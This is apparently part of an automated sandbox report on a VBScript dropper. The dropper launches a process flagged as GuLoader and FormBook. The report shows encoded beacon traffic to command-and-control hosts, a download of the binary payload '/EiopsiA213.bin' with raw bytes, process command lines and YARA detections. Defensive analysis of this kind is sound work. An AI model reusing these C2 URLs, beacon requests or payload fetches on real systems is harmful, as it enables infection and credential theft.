                                                Aug 27, 2024 08:05:17.563190937 CEST9023OUTData Raw: 67 31 6a 65 31 4d 67 76 6c 45 6c 4c 65 77 49 7a 63 2b 42 42 44 58 76 56 6d 52 74 4d 4e 44 49 69 76 46 64 57 4e 6b 64 41 61 6c 47 46 6e 48 58 6c 37 68 53 6e 52 75 55 32 51 4c 77 66 63 48 4e 65 57 2b 33 42 4d 49 39 2b 36 6a 78 67 44 37 6c 4d 34 33
                                                Data Ascii: g1je1MgvlElLewIzc+BBDXvVmRtMNDIivFdWNkdAalGFnHXl7hSnRuU2QLwfcHNeW+3BMI9+6jxgD7lM43Lpgxkz8P1mZoZeloiBv/YrRoVGPxKXn06A8JyxmGcBELg/HiQjP6WMNj28KiGgL+zOOe9Yko5d9sA24fHY33E/h5CcwrlzIDWiHMvQZ6HCiULQvsjHRkiayWg19uq+uO2zFGQhnp75dApQ5oLHFWTQWcQuD8kqn2x
                                                Aug 27, 2024 08:05:17.802840948 CEST1289OUTData Raw: 4c 61 6e 6c 4d 6c 67 31 64 79 33 57 6a 75 4b 74 32 53 41 45 58 4e 41 73 61 63 4e 31 44 4c 35 4d 79 78 44 2f 75 39 31 72 48 46 7a 32 59 73 71 41 58 51 72 63 5a 52 57 6f 6b 32 68 70 2f 69 4e 75 48 66 37 2f 4d 44 4a 50 43 54 39 57 32 35 54 76 4b 4a
                                                Data Ascii: LanlMlg1dy3WjuKt2SAEXNAsacN1DL5MyxD/u91rHFz2YsqAXQrcZRWok2hp/iNuHf7/MDJPCT9W25TvKJ0KOCO3b/MWL/IkyDQqMzvUQ5bgp7XSrv4u6t8f7Nmfc5PdpnZ5C8IxBYNajtsMaY3f99w7Q08EGkYG9t28RZ1ERMzyD51EgHfN4dlSQQgpxQzrVTHpxrx5KgsqsqBWCMjtcJ4zYOaXW5dZQnJ6h2mSsUsQrwfez+O
                                                Aug 27, 2024 08:05:17.803014040 CEST19335OUTData Raw: 6c 43 73 6f 4d 77 45 45 74 66 50 49 4f 55 66 56 76 56 78 57 67 52 78 64 61 59 55 57 71 34 58 64 69 58 4d 66 44 41 74 4f 4a 45 56 52 39 51 66 50 75 46 74 62 57 79 59 63 69 65 45 62 4f 42 4a 4d 2f 47 5a 6d 47 51 4c 31 54 4f 44 68 69 43 75 43 73 63
                                                Data Ascii: lCsoMwEEtfPIOUfVvVxWgRxdaYUWq4XdiXMfDAtOJEVR9QfPuFtbWyYcieEbOBJM/GZmGQL1TODhiCuCscOhpPU4P/G6psFlFnY1Enh//ZXwBm0u8MI5hFhAlAF3FBe2NSBdSta7sMmsd92Hp2psLJa38gqw5mEUe17zDmtFECUWgakQucfVbnSpaQ0D9DsWjkJSCvbRDNbmeJe9Nklqc/9aqFDCDMAgCfK9AbZn4OS+gHQiSdR
                                                Aug 27, 2024 08:05:17.803179026 CEST1289OUTData Raw: 46 4c 57 6f 37 70 6d 57 41 54 67 4c 51 55 48 68 7a 41 53 31 55 63 4c 56 43 4b 59 6e 44 45 71 4c 77 51 65 56 38 52 4a 47 39 61 4e 2f 63 44 6c 63 47 7a 6c 62 71 37 65 2b 65 63 66 4c 44 35 39 76 32 6c 4c 54 7a 36 6f 36 65 69 34 41 52 79 51 63 50 47
                                                Data Ascii: FLWo7pmWATgLQUHhzAS1UcLVCKYnDEqLwQeV8RJG9aN/cDlcGzlbq7e+ecfLD59v2lLTz6o6ei4ARyQcPGCHZLEAqXfXbJ/FVpZ3h1ZorSytLK++UrZK/tqB30aGZX7pTNyeg5tPIqH8JgEJc9TjYhnLdSUvt71EiRf8cLXYL1VjFP+noAbowwqmVVuGP2pHhQrJRrurCRcl6wnTwzG/sp/5DyTO3SZt+AKcrcfEBMlp4HJdUwR
                                                Aug 27, 2024 08:05:17.803349972 CEST3867OUTData Raw: 64 46 4a 4c 6a 39 68 30 46 63 43 54 59 6f 35 6f 4b 42 61 79 72 6d 31 4a 4a 45 53 36 75 35 69 57 50 38 37 6b 4f 68 63 42 68 77 79 55 68 43 61 6e 48 72 2b 61 2f 46 32 36 4a 6c 73 4e 52 6d 2f 32 44 6c 75 73 50 32 36 6d 69 70 73 64 41 31 61 58 39 58
                                                Data Ascii: dFJLj9h0FcCTYo5oKBayrm1JJES6u5iWP87kOhcBhwyUhCanHr+a/F26JlsNRm/2DlusP26mipsdA1aX9X3YA6X0Sc060IV8MumqZMNDZkakf3joFw392TE55Pqy2JOiL20+7o6n3NlRykN9b0T88oMURSRhUOeaQO0O9rXijT18s222yX09A8ym+mkI9RLSRjjTZaBJw0e4odh5XBFiO6j+hLNjv38i/Dx6n/7iwVnE0mfLSQ5
                                                Aug 27, 2024 08:05:18.042315960 CEST1289OUTData Raw: 4e 78 4e 4b 42 50 53 57 52 6a 32 38 63 62 39 54 6d 61 64 52 59 36 6a 66 73 4a 4a 4f 4f 4a 42 49 76 6c 66 74 44 38 5a 54 38 43 36 54 51 6f 35 39 66 61 52 51 6d 72 67 59 66 51 77 41 56 35 48 49 42 78 61 38 39 42 6d 67 36 42 63 4c 49 53 31 53 4d 32
                                                Data Ascii: NxNKBPSWRj28cb9TmadRY6jfsJJOOJBIvlftD8ZT8C6TQo59faRQmrgYfQwAV5HIBxa89Bmg6BcLIS1SM2/TRc9UeIwii1ZIHqZ4eUJmCzu1IGHtiZpQMYckpsjddVPYorpg2Gj7T69Jop2BoJsT+WZu9KF+9JhZEm9/9eA5Z7p/lRLc2XMwPPb+tZASAD3hgK1MUGNgFaMLn7nK02ouDv0uU+5qRBpMANLGGst0ZZ8nmrkPQTy
                                                Aug 27, 2024 08:05:18.042512894 CEST1289OUTData Raw: 77 73 51 4f 58 41 37 57 75 77 31 6f 6d 61 70 58 53 33 68 57 4a 39 6a 59 38 79 79 62 58 32 59 53 68 54 36 6a 62 30 71 68 74 78 66 45 42 73 48 42 65 69 38 63 45 57 6e 5a 5a 57 6a 43 73 66 64 47 61 54 4c 38 6a 75 61 35 2f 51 38 6c 42 5a 35 7a 75 73
                                                Data Ascii: wsQOXA7Wuw1omapXS3hWJ9jY8yybX2YShT6jb0qhtxfEBsHBei8cEWnZZWjCsfdGaTL8jua5/Q8lBZ5zus8UGiHacDPdSxPXxZVwm6VVHcEVTriiEtzxmYXvl/PQP67OxJrmfDFybhj/iKnbQB9sKySK5RHf/cdhocXy2IfkGWAKvrMoVjAE6vyLByx7DkTJS5mC/ENNduc0B0aaxlN8Ws1ClcUJ8kIlDDWq2r4HqGHPUTQojX8
                                                Aug 27, 2024 08:05:18.042651892 CEST6445OUTData Raw: 72 59 6d 47 34 33 55 6f 49 72 58 42 44 51 64 70 2f 68 2b 76 4a 36 47 52 74 53 32 48 36 47 77 69 33 39 73 6b 6b 57 68 4d 4c 51 49 39 6c 6b 4f 69 56 66 73 55 6c 65 51 48 76 4b 34 41 36 34 7a 33 6a 71 75 51 6e 75 4c 76 56 4a 70 36 4a 42 63 78 4a 43
                                                Data Ascii: rYmG43UoIrXBDQdp/h+vJ6GRtS2H6Gwi39skkWhMLQI9lkOiVfsUleQHvK4A64z3jquQnuLvVJp6JBcxJCOuSXYUQkKQESTJdxSDR4f/jpVW92625moiSNGm6rsCH/munODQvMrFzhw56IA7UpCfbXHrsaWxTjVmlpvaQueGIL52xwua34OTeJHbrIHQ4qH1c9ljmeAxFJ64DQYKs7wip38E5+VuSuCE/F11H57GT5culXIT2E3
                                                Aug 27, 2024 08:05:18.042879105 CEST5867OUTData Raw: 4c 67 35 47 75 77 74 43 56 45 52 54 52 73 4a 53 6d 46 77 4a 6e 64 37 44 62 73 4b 30 79 39 4d 4d 4c 67 6e 45 55 5a 69 42 51 2b 42 55 63 71 65 36 68 51 31 36 7a 79 73 39 6c 46 50 43 56 59 62 64 35 45 59 78 6f 62 4f 47 31 50 71 41 38 68 4b 76 6d 4a
                                                Data Ascii: Lg5GuwtCVERTRsJSmFwJnd7DbsK0y9MMLgnEUZiBQ+BUcqe6hQ16zys9lFPCVYbd5EYxobOG1PqA8hKvmJmzcocwnROGZXRWtm0n3vcxVpHRa0NskROQH9teOb5H5kOzNguvatEmopRf4VJNvlN7ANyJgToI8XOJzgZuhXwJoo7PyzcSeDnZ8oPmYSDUaVllfMJwZdZboXMY5ldWym7PlNAiCcZ0EEhF7S2Y3Bi8Kd105slvh5y
                                                Aug 27, 2024 08:05:18.337784052 CEST292INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:05:18 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip
                                                Data Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 0b 4a cd 49 2c 49 4d 51 08 48 4c 4f 55 c8 cb 2f 51 48 cb 2f cd 4b b1 d1 07 4a d9 14 d8 05 e7 17 15 55 ea 28 94 a7 2a 24 27 e6 81 65 33 f3 52 14 4a 32 12 4b 14 0a 80 1a f4 6c f4 0b ec 00 92 2e 89 84 46 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 540JI,IMQHLOU/QH/KJU(*$'e3RJ2Kl.F0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                89192.168.11.2049931185.230.15.380
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:05:20.341361046 CEST555OUTGET /ns8q/?ij60MtY=Inf42ZVLRw6HwISCOPUKL9E43+GpX4bkPpg82teOxrbDSww0PzIRQy8gHWXiaO2t1uZOdy10GUfR4hRxDB6Ts5zJpETBxtnbe//OQKeepMDnU8nxUbj7e0s=&tvodg=2Zld-RLxEfN HTTP/1.1
                                                Host: www.home-check.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:05:20.632642031 CEST254INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:05:20 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Data Raw: 34 36 0d 0a 3c 68 31 3e 52 65 6c 61 74 65 64 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 53 6f 72 72 79 2c 20 77 65 20 63 61 6e 6e 6f 74 20 66 69 6e 64 20 74 68 61 74 20 70 61 67 65 2e 3c 2f 70 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 46<h1>Related Page not found</h1><p>Sorry, we cannot find that page.</p>0


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.11.2049840199.103.62.2054436800C:\Users\user\AppData\Local\Temp\x.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 05:57:27 UTC176OUTGET /EiopsiA213.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: www.groupriam.com
                                                Cache-Control: no-cache
                                                2024-08-27 05:57:27 UTC422INHTTP/1.1 200 OK
                                                Connection: close
                                                content-type: application/octet-stream
                                                last-modified: Mon, 26 Aug 2024 22:29:31 GMT
                                                accept-ranges: bytes
                                                content-length: 336448
                                                date: Tue, 27 Aug 2024 05:57:27 GMT
                                                server: LiteSpeed
                                                vary: User-Agent
                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                2024-08-27 05:57:27 UTC946INData Raw: 11 79 ce e0 e0 1a 5b 9c 1b 9a 7b d6 12 bc 12 31 01 0f b5 4a 33 77 4c 8b 6b 53 f0 60 88 1e 5d dd 86 50 84 88 fa 6c e4 33 3b df b9 42 9f de 5d 13 72 69 72 1b d0 09 53 34 cf 88 7f b7 db 67 4f 27 6f db cb 86 1b 74 b5 a3 87 9e 00 3a c8 26 0f f9 da d9 12 3a f6 76 90 5d 8b 70 57 63 02 65 49 da c2 d6 04 0d cb a8 98 e4 7c 37 a7 0c 16 2c 19 0e b5 6a 14 e1 6e 08 8a 7b 8a d2 65 fb bc 69 fd 13 3e a7 62 64 d9 b1 d9 49 12 c3 8e 3c a5 8e 89 06 4a dc 39 2d 69 06 9b d6 34 6b c6 bc fe 59 55 a8 61 34 b8 ab 6d 16 0f ac 59 4c 5e 24 81 fb 5b a9 a5 5f 1d d0 13 b2 16 2d 74 0a 48 b9 a7 1b ca 19 4c 8d 4c c4 f8 e6 1f 81 c0 59 48 ea 94 97 53 a8 08 38 eb 9d 9b 3a ef c6 43 a8 14 12 99 1b b7 e9 36 63 77 d3 1b 55 e7 e3 ce a6 e3 ea 3d f2 13 0d 77 18 43 25 c6 5b 1d c2 e4 4a 21 d7 51 12 88
                                                Data Ascii: y[{1J3wLkS`]Pl3;B]rirS4gO'ot:&:v]pWceI|7,jn{ei>bdI<J9-i4kYUa4mYL^$[_-tHLLYHS8:C6cwU=wC%[J!Q
                                                2024-08-27 05:57:27 UTC14994INData Raw: e8 a7 90 7f e9 66 ef 1b e6 f4 84 16 60 27 65 5a 93 f8 68 74 96 06 9c ed 33 18 a6 00 2a d9 17 f5 37 7c 97 7b 04 6c cb d1 79 a4 86 4d 4f b3 dd 45 51 2e e2 9a 32 95 12 19 71 cc 8e 34 e3 49 09 d4 d0 33 55 a7 1d f7 7f cc 3f ef c1 4a 37 10 c5 23 d3 bd 95 df 10 28 42 17 15 93 21 17 bf aa e8 e9 90 8a a8 16 5f d1 39 fd 04 99 5b 84 6e e6 1e 97 d3 48 4d a0 05 f1 02 d6 71 3a 98 77 50 9e af 14 3c d0 2c e5 ea 24 2a 6b ff 5c e0 00 d1 b9 74 ad 39 d6 c2 8d a0 7d 2d b6 8f 68 21 6c 31 37 de b5 ba 35 1f 9e d2 48 2c 49 04 3f ca 33 06 22 cf ee 2d a5 0b 52 24 af 2c c3 f5 9c 23 25 87 8c ed cd 0d 65 11 32 ed a4 ea 89 f4 19 7c c0 96 02 94 33 bc 88 6d 3c db a9 e3 f2 08 dd 5e 2f 20 e9 87 53 8d 66 c7 37 9b 4d 57 b0 59 b5 12 ef d4 09 82 63 68 ab 07 a1 e2 17 58 92 0c 7c f3 7d 0e 87 61
                                                Data Ascii: f`'eZht3*7|{lyMOEQ.2q4I3U?J7#(B!_9[nHMq:wP<,$*k\t9}-h!l175H,I?3"-R$,#%e2|3m<^/ Sf7MWYchX|}a
                                                2024-08-27 05:57:27 UTC16384INData Raw: 68 11 09 51 3b 64 f6 0e d5 61 24 ec 06 6e f7 58 d3 c6 3c 28 6b fd 21 f3 7e 6f fc ea 7b 66 5d 7b 13 02 25 03 c6 c0 27 8a 88 c2 c7 c9 4a 86 bb 1e 72 fb 8a 08 d8 5b 12 e2 6d 08 b8 d3 6e 5e 07 82 0c 41 98 90 c3 3b d9 d1 ff 42 47 cc 96 98 cf 69 b9 9a 13 ed 31 44 a7 f7 dd d6 6d 77 4a 0e a0 00 26 c3 1a 3e 1e fa 53 9b 42 54 80 d9 68 39 de 9c 92 be 93 00 f5 02 68 d8 1e a6 66 0c ad e5 53 b1 69 1a b2 7b ec bd 14 72 63 16 f5 fa d0 e3 ab af 9f 3f 0c c1 3c 90 29 d9 78 fe 09 45 a1 a3 c3 16 72 14 ed ed 77 fa 62 bd c2 58 85 a6 11 5d e9 91 e1 9b 35 ac a1 9c 5c 1e c0 1a 98 79 3e 7c c2 a3 88 89 55 aa 6f c3 f3 4a 57 04 74 f1 4e 8b 36 a3 e8 85 50 20 b4 d5 9d e7 95 c4 f8 38 d8 08 d9 25 fe 6f 4c 66 19 66 8f 1a 3a 52 7d 34 b2 e9 8b 62 07 c3 9d 56 75 a2 ab d5 85 dd 95 19 43 86 59
                                                Data Ascii: hQ;da$nX<(k!~o{f]{%'Jr[mn^A;BGi1DmwJ&>SBTh9hfSi{rc?<)xErwbX]5\y>|UoJWtN6P 8%oLff:R}4bVuCY
                                                2024-08-27 05:57:28 UTC16384INData Raw: 1d a2 eb f6 21 c1 aa 47 69 7e ec 8d 6d 43 24 9d fc 2e 01 6f 43 3b 85 e9 f9 c2 95 98 ab 5f 1b 03 52 c9 c6 30 8a b3 9e 92 05 c6 1d 9c 71 15 37 44 bb 64 a4 3c 31 b2 1c 17 cf f3 7d 10 f2 e0 fa 8c 5e 23 80 91 31 a7 22 88 31 79 d9 29 ba 88 a1 33 b8 1b 4a 21 1a 28 09 fd d6 0b 5a 6e 8b a8 f8 f3 30 8d 66 d2 41 de bd c4 8c a9 70 39 1d 21 03 a9 69 67 ba 56 52 66 81 4c ec c3 db b5 b5 b1 cf 12 85 7b f6 71 72 77 e1 12 87 da f2 a7 22 4f 39 db 4c bc e5 a8 d5 6f 60 71 ba 42 36 28 ff 14 25 8c a4 db 05 cf cc 4b 3d 8e 00 f7 8b 19 f1 cb 65 27 fe dc 4d 7b 86 66 e7 d7 e3 5f ef 81 30 df f4 d5 c8 e6 3f ab 08 58 e0 cc 2f c7 e6 11 94 20 89 9d bc fa d4 07 5a 9c 2b 71 e8 ac ed d8 c0 68 45 28 30 7b 45 3c 54 53 b3 38 f9 a5 c4 5d 85 4e 28 0e e4 31 8d 26 90 4c 8b fd d7 bd 4d 7a e5 b8 15
                                                Data Ascii: !Gi~mC$.oC;_R0q7Dd<1}^#1"1y)3J!(Zn0fAp9!igVRfL{qrw"O9Lo`qB6(%K=e'M{f_0?X/ Z+qhE(0{E<TS8]N(1&LMz
                                                2024-08-27 05:57:28 UTC16384INData Raw: a5 dd 39 8c b5 47 f4 6a b5 e4 a5 ba 98 86 05 35 cd 90 71 e5 9f dc fe 54 02 74 8f 1a e5 0e 23 4d 67 e9 c8 19 7e c3 ce 7d 36 9a 73 2b 9b 90 e6 a7 8e d5 36 b3 9a 12 3b 14 78 0b 06 15 0e 4e 57 60 08 87 46 e8 05 b0 e0 b8 62 b9 75 fd f8 2e 22 54 3c 34 9b 89 45 08 1c 3f f8 83 50 88 7b 7a 5f 37 6c 33 ad e2 11 ec dd 9c 4a e2 bb 4f 4f c2 ee be 0d 0a a5 b7 b3 40 63 97 44 cc 22 cc 90 34 bb 75 61 f5 dd f8 02 7d 6c 06 54 6b ad df 94 ff 93 b6 8e 12 6b ad 7b 53 22 30 d9 92 6b d7 f8 c2 f2 a9 d8 e8 4b 31 2d ac 4e eb 21 a6 18 1e ae 13 0a 4c 7c 9c d0 3f 10 5a 35 b2 8c 3a 82 92 8b 2b 1e 73 85 fc 20 fc c9 43 3b a3 6b 35 66 72 7d 73 cc 28 80 a9 7b dd 5e 8a 23 07 4b 83 2a cf d5 85 c1 18 59 e1 b3 46 79 6a 2f 6c 8f 4e 21 bc 6d c0 6c 0f a7 a4 33 02 e9 93 60 77 7f 7b c9 9e c9 aa e2
                                                Data Ascii: 9Gj5qTt#Mg~}6s+6;xNW`Fbu."T<4E?P{z_7l3JOO@cD"4ua}lTkk{S"0kK1-N!L|?Z5:+s C;k5fr}s({^#K*YFyj/lN!ml3`w{
                                                2024-08-27 05:57:28 UTC16384INData Raw: 0c b1 24 ae 0c 77 df a1 29 a7 6b 14 9a 55 f5 c5 66 61 80 78 d4 96 a6 7c 33 29 58 b6 49 a2 2b 70 60 62 dc ed e7 62 c6 a5 97 10 e7 12 74 94 01 30 e2 a4 0a 7c 50 d4 1f be 28 78 a1 d1 c8 0d 71 fb 46 f6 ea 1a b8 24 a2 1b 41 6f 51 30 4f ed c3 ca fd 68 ea 79 2d bc 8d 29 1e 1f 7e 71 ec f7 f2 da 81 29 15 45 17 68 38 7a e4 b3 45 62 f5 16 99 c1 b5 45 6e d4 d9 ce 00 28 81 40 1c 91 7f c2 b2 fa 93 76 65 d9 3f ce 7e af d0 8d ed 8c a2 95 be ec 51 48 d7 77 dd 11 7d 66 6d 78 50 09 f5 05 b8 ac 80 9d 1e 86 c1 51 23 1f b7 e4 80 f7 6f 67 09 77 89 5c 78 29 86 31 a8 3e f1 8e d0 35 75 1c 21 ad 7e b8 6c f9 5d f3 b1 e2 20 dd 53 c2 85 8b 38 87 47 b4 16 c0 7f 4c aa c3 c8 ec e8 a2 05 1a e2 b7 53 64 bf eb a5 5c 72 2c f4 22 51 4e 08 e7 da 84 ae 00 17 af c8 09 79 4c 3a 2a ab 4f 64 03 ec
                                                Data Ascii: $w)kUfax|3)XI+p`bbt0|P(xqF$AoQ0Ohy-)~q)Eh8zEbEn(@ve?~QHw}fmxPQ#ogw\x)1>5u!~l] S8GLSd\r,"QNyL:*Od
                                                2024-08-27 05:57:28 UTC16384INData Raw: bf f3 4e 6d ac fe 38 6d 94 1f 2e 06 27 52 60 ff 8c 79 ff b5 7b c1 c6 7d e4 ee 75 b0 c6 7b 8c 41 63 03 9c 7c 18 80 03 80 19 7d 2d 7b ba 6b 88 d0 d0 6c 5d b7 a3 a6 97 c8 b9 c8 92 92 6d 40 16 42 9f 9f 5f 03 e0 28 e0 40 10 18 fc 16 ab a2 6c 74 98 a4 54 a0 59 fe c3 6e f6 a6 1b b6 7b 66 71 25 48 32 04 eb 44 7b 5b c2 05 6a bb a4 03 dd db 9d a8 a8 72 a3 89 b9 ab 9e 76 c9 a8 18 3d 53 0c 15 dc 84 31 bd 7e d8 80 e7 a6 e2 0d 2e d8 45 3e 84 e9 ea b4 a2 1c ac 41 b7 d4 9c c1 8d c8 29 73 d8 91 cd 8e 5e ae ab d1 81 cb 19 9c 1d 8a 3c 83 e6 51 54 8d fb 1a fa ad 13 85 d0 48 0e d4 84 32 1f db b0 5a 68 a1 53 6b dd e8 0c 38 29 be 69 1d eb 56 5b c0 39 cb a7 21 41 4c 5b c9 7f 3a 7e c0 05 4a 6f 47 82 98 d9 20 39 5f b4 d8 9a 95 e0 c8 d4 95 14 73 f1 c3 af d1 ef f7 e3 1a 1b a7 5e 34
                                                Data Ascii: Nm8m.'R`y{}u{Ac|}-{kl]m@B_(@ltTYn{fq%H2D{[jrv=S1~.E>A)s^<QTH2ZhSk8)iV[9!AL[:~JoG 9_s^4
                                                2024-08-27 05:57:28 UTC16384INData Raw: 74 b9 0d 93 98 91 d1 a7 27 4e cd d3 a9 fe b7 4a 3f 6c ac 90 c9 db 4a f8 c2 2d 43 a4 3b 36 1e 56 fd c0 ec 5d 1f a0 62 41 5a a9 5e 73 4c 7f 2f 06 04 fb d3 7b 96 41 38 03 2b 3e 72 5f 99 4e 2e 7d 64 64 9c a8 a9 65 5e 84 e1 84 5c 1c 75 c7 7f 3e 89 b4 ac eb f0 d2 21 7e d6 3d 30 0d fc 2e 9b 6f 67 f6 03 dc 63 30 e0 fd bc 6f c9 e3 4d 9b 2f 2a 30 90 36 9e d2 c3 ef 7a 3f 06 ab e2 a9 87 7e 06 58 18 e9 60 78 ee 4a 8d 45 d7 8f 46 5e ca b3 32 73 b5 80 9a 66 cc 67 2b 18 c1 35 c6 b5 6d 7f d6 0b ab 56 15 5f 38 e8 98 52 6b b4 c5 34 18 5d 57 fd 74 17 39 22 ba 1d e9 a4 81 89 93 92 04 16 a3 04 ba 2f 80 15 4b 4d 62 2a 16 4f bd 5c a2 3a 0e df 68 bf af 37 95 88 1e 35 8e 3e 8d 78 c1 e4 87 5d b3 24 fc ac 94 43 2f cc 69 f7 d1 c6 54 99 ad fc 99 77 29 6b 11 7c eb 18 48 f6 e9 bc 48 12
                                                Data Ascii: t'NJ?lJ-C;6V]bAZ^sL/{A8+>r_N.}dde^\u>!~=0.ogc0oM/*06z?~X`xJEF^2sfg+5mV_8Rk4]Wt9"/KMb*O\:h75>x]$C/iTw)k|HH
                                                2024-08-27 05:57:28 UTC16384INData Raw: f9 f6 7b 53 bf 9c 82 45 e3 a3 56 4b dc e0 d3 28 85 4e 91 5a be b1 a1 a8 97 c7 38 13 cd be 23 09 78 b8 a3 d3 99 87 a8 12 99 f8 b4 3a 43 dc 13 ad 34 63 37 45 b0 07 31 8d 72 5f 21 32 2b 93 a0 db 05 24 ac 30 d3 3b 32 83 45 c3 e7 fd 2e 47 f1 38 17 8c 72 62 6e 95 0f 01 68 9d a9 37 7b 84 ed a2 8b 94 a6 b9 0a ca 6e 31 9f e1 03 c7 75 a0 10 03 fe 06 08 45 7e ea a8 9c f8 db 77 6f e6 80 86 3e af db 45 41 a6 bc d9 74 8c 57 9d fd 30 c0 04 09 ea e5 17 1f 6a b6 19 73 24 f5 f5 96 66 48 6e 4c 6b ed ec 6a 89 ef b4 c6 96 a9 54 32 5a 43 cb 07 be 60 81 98 57 a5 cd bf 75 05 eb 78 03 dd ec fb b7 38 94 67 16 a4 f4 ab 68 49 5f 79 38 04 c5 57 d3 86 b1 4b 05 62 23 ce 9f 77 b0 cc 1f f6 65 51 fe 68 cb 3e ac 78 18 e8 c4 dd db c8 5d 1c a6 6f 26 1d 79 e6 aa 3b 91 57 f9 b1 9d 51 00 80 b4
                                                Data Ascii: {SEVK(NZ8#x:C4c7E1r_!2+$0;2E.G8rbnh7{n1uE~wo>EAtW0js$fHnLkjT2ZC`Wux8ghI_y8WKb#weQh>x]o&y;WQ
                                                2024-08-27 05:57:28 UTC444INData Raw: 3d 18 8e 19 11 8e 96 26 0d ff 43 ee 2c 09 c4 b0 50 a6 a2 4c 88 4d 61 1a 92 b3 ed 00 ff 7b 19 72 a9 59 28 6c 7a ad e3 96 1f 94 a4 03 b7 22 66 bc 41 39 f3 4c 43 9e 0f 03 00 8f 6d 7a 90 37 b5 69 c8 31 0f 4e 6f 61 d4 33 d7 7b 40 a4 34 76 25 72 65 b1 82 96 b2 8d 0e 17 9a 2f 6c 60 ad 88 73 76 41 44 d9 28 cd 4d 97 ef 64 4c 45 b1 4f c7 b2 da aa ac 77 ea 42 1c 47 3e f9 3f 96 48 97 65 72 6b 91 e8 c0 43 7e d0 c6 66 3b 6f 8c 38 02 c3 09 a7 fa d3 e5 9d 2d 09 a8 d7 86 18 18 59 70 2f 57 e5 54 9c 9b d4 98 3d 6a 1d 52 ac 15 f5 ff b6 1c f5 bf bb a9 98 92 d1 09 11 cb 62 01 cb 19 46 42 ea 47 76 c4 76 f6 b5 df 65 03 fe 42 2c 88 17 7d 8c 60 2f c1 94 5a fb 67 21 50 fc f9 3f 6d 59 71 ce a6 d7 0f c3 79 72 d2 c7 17 ed 6d 6d 8b d1 69 f2 93 be 6c 45 7d 11 e7 96 fe ea 6d 48 a1 18 ae
                                                Data Ascii: =&C,PLMa{rY(lz"fA9LCmz7i1Noa3{@4v%re/l`svAD(MdLEOwBG>?HerkC~f;o8-Yp/WT=jRbFBGvveB,}`/Zg!P?mYqyrmmilE}mH


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:01:56:26
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs"
                                                Imagebase:0x7ff6712a0000
                                                File size:170'496 bytes
                                                MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:01:56:33
                                                Start date:27/08/2024
                                                Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                Imagebase:0x400000
                                                File size:757'008 bytes
                                                MD5 hash:36EFC401E52E98CD1C735D8A767A1E6D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.136009104486.00000000038BE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:01:57:22
                                                Start date:27/08/2024
                                                Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                Imagebase:0x400000
                                                File size:757'008 bytes
                                                MD5 hash:36EFC401E52E98CD1C735D8A767A1E6D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.136239540037.0000000035220000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.136239540037.0000000035220000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
